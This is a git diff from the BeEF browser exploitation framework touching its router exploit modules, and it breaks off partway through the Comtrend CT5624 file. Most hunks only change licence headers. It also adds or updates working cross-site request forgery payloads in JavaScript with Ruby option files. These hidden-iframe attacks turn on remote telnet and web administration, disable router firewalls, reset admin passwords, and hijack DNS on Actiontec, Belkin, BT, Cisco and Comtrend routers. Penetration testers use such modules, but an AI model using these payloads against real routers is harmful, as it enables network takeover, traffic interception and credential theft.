diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
index 157669422..03f13e41d 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
index 675efdd36..7d7af686c 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Com_officeconnect_cmd_exec < BeEF::Core::Command
   
diff --git a/modules/exploits/router/actiontec_q1000_csrf/command.js b/modules/exploits/router/actiontec_q1000_csrf/command.js
new file mode 100644
index 000000000..1a444473c
--- /dev/null
+++ b/modules/exploits/router/actiontec_q1000_csrf/command.js
@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var user    = '<%= @user %>';
+	var passwd  = '<%= @password %>';
+	var port    = '<%= @port %>';
+	var timeout = 15;
+
+	var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlHttp',          'value':'1'},
+		{'type':'hidden', 'name':'adminUserName',       'value':user},
+		{'type':'hidden', 'name':'adminPassword',       'value':passwd},
+		{'type':'hidden', 'name':'remGuiTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remGuiPort',          'value':port}
+	]);
+
+	var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlTelnet',        'value':'1'},
+		{'type':'hidden', 'name':'remTelUser',          'value':user},
+		{'type':'hidden', 'name':'remTelPass',          'value':passwd},
+		{'type':'hidden', 'name':'remTelTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remTelPassChanged',   'value':'1'}
+	]);
+
+	var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'fwLevel',             'value':'Basic'},
+		{'type':'hidden', 'name':'fwStealthMode',       'value':'0'}
+	]);
+
+	var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'ipv6_fwlevel',        'value':'basic'},
+		{'type':'hidden', 'name':'ipv6_fwenable',       'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/actiontec_q1000_csrf/config.yaml b/modules/exploits/router/actiontec_q1000_csrf/config.yaml
new file mode 100644
index 000000000..be4b1634a
--- /dev/null
+++ b/modules/exploits/router/actiontec_q1000_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        actiontec_q1000_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Actiontec Q1000 CSRF"
+            description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router."
+            authors: ["james-otten"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/router/actiontec_q1000_csrf/module.rb b/modules/exploits/router/actiontec_q1000_csrf/module.rb
new file mode 100644
index 000000000..40000e2e4
--- /dev/null
+++ b/modules/exploits/router/actiontec_q1000_csrf/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Actiontec_q1000_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin'},
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF'},
+			{'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
index 4bf78dfec..9a7da976c 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var gateway = '<%= @base %>'; 
@@ -23,7 +14,7 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.id = 'asmax_ar804gu';
+	img.id = 'asmax_ar804gu_<%= @command_id %>';
 	img.src = gateway+path+cmd;
 	document.body.appendChild(img);
 
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
index 44c2ca602..ab3b12fb0 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
index f330c301c..55645a6cb 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Asmax_ar804gu_cmd_exec < BeEF::Core::Command
   
diff --git a/modules/exploits/router/belkin_dns_csrf/command.js b/modules/exploits/router/belkin_dns_csrf/command.js
new file mode 100644
index 000000000..1bea76e03
--- /dev/null
+++ b/modules/exploits/router/belkin_dns_csrf/command.js
@@ -0,0 +1,70 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/setup_dns.exe';
+	var dns     = '<%= @dns %>';
+	var timeout = 15;
+
+	// validate DNS server IP address
+	var parts = dns.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+			return;
+		}
+	}
+	var dns_1 = parts[0];
+	var dns_2 = parts[1];
+	var dns_3 = parts[2];
+	var dns_4 = parts[3];
+
+	// attempt auth with default password (admin)
+	// incorrect login attempts do not log out an authenticated session
+	var img = new Image();
+	img.setAttribute("style", "visibility:hidden");
+	img.setAttribute("width", "0");
+	img.setAttribute("height","0");
+	img.id = 'belkin_auth_<%= @command_id %>';
+	img.src = gateway+"/cgi-bin/login.exe?pws=admin";
+	document.body.appendChild(img);
+
+	// change DNS
+	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
+		{'type':'hidden', 'name':'dns1_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns1_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns1_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns1_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
+		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(belkin_iframe_<%= @command_id %>);
+		document.body.removeChild(belkin_auth_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/belkin_dns_csrf/config.yaml b/modules/exploits/router/belkin_dns_csrf/config.yaml
new file mode 100644
index 000000000..9e8a27612
--- /dev/null
+++ b/modules/exploits/router/belkin_dns_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        belkin_dns_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Belkin DNS Hijack CSRF"
+            description: "Attempts to change the DNS setting on a Belkin router.

Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/router/belkin_dns_csrf/module.rb b/modules/exploits/router/belkin_dns_csrf/module.rb
new file mode 100644
index 000000000..2418dbfe0
--- /dev/null
+++ b/modules/exploits/router/belkin_dns_csrf/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested
+###
+class Belkin_dns_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+			{'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/router/bt_home_hub_csrf/command.js b/modules/exploits/router/bt_home_hub_csrf/command.js
index d20374dbe..2ab008044 100644
--- a/modules/exploits/router/bt_home_hub_csrf/command.js
+++ b/modules/exploits/router/bt_home_hub_csrf/command.js
@@ -1,35 +1,26 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-
-
-  var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
-      [{'type':'hidden', 'name':'0', 'value':'31'} ,
-       {'type':'hidden', 'name':'1', 'value':''},
-       {'type':'hidden', 'name':'30', 'value':passwd}]);
+  var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
+    {'type':'hidden', 'name':'0',  'value':'31'} ,
+    {'type':'hidden', 'name':'1',  'value':''},
+    {'type':'hidden', 'name':'30', 'value':passwd}
+  ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(bt_home_hub_iframe);
+    document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml
index 39034eba7..64c6468a0 100644
--- a/modules/exploits/router/bt_home_hub_csrf/config.yaml
+++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/bt_home_hub_csrf/module.rb b/modules/exploits/router/bt_home_hub_csrf/module.rb
index a63a69876..23dac4cf4 100644
--- a/modules/exploits/router/bt_home_hub_csrf/module.rb
+++ b/modules/exploits/router/bt_home_hub_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Bt_home_hub_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js
index e3c548b0e..3a807e582 100644
--- a/modules/exploits/router/cisco_e2400_csrf/command.js
+++ b/modules/exploits/router/cisco_e2400_csrf/command.js
@@ -1,23 +1,15 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',     'value':'Management'},
        {'type':'hidden', 'name':'change_action',     'value':''},
@@ -46,7 +38,7 @@ beef.execute(function() {
        {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
       ]);
 
-  var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',       'value':'Firewall'},
        {'type':'hidden', 'name':'change_action',       'value':''},
@@ -68,10 +60,10 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(cisco_e2400_iframe1);
-    document.body.removeChild(cisco_e2400_iframe2);
+    document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>);
+    document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/cisco_e2400_csrf/config.yaml b/modules/exploits/router/cisco_e2400_csrf/config.yaml
index 2b3e0c519..3602c11af 100644
--- a/modules/exploits/router/cisco_e2400_csrf/config.yaml
+++ b/modules/exploits/router/cisco_e2400_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/cisco_e2400_csrf/module.rb b/modules/exploits/router/cisco_e2400_csrf/module.rb
index 0af343362..51e286038 100644
--- a/modules/exploits/router/cisco_e2400_csrf/module.rb
+++ b/modules/exploits/router/cisco_e2400_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Cisco_e2400_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js
index d713b6b06..b9917bf6a 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js
@@ -1,26 +1,18 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
   form.setAttribute('action', gateway + "password.cgi");
@@ -46,16 +38,16 @@ beef.execute(function() {
   input.setAttribute('value', passwd);
   form.appendChild(input);
 
-  ct5367_iframe2.contentWindow.document.body.appendChild(form);
+  ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form);
   form.submit();
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
index c579a47b9..641dbdfa7 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/module.rb b/modules/exploits/router/comtrend_ct5367_csrf/module.rb
index 13ae2bb76..44278f378 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/module.rb
+++ b/modules/exploits/router/comtrend_ct5367_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Comtrend_ct5367_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js
index afe248983..08ecf84ae 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js
@@ -1,35 +1,27 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
-  ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
 
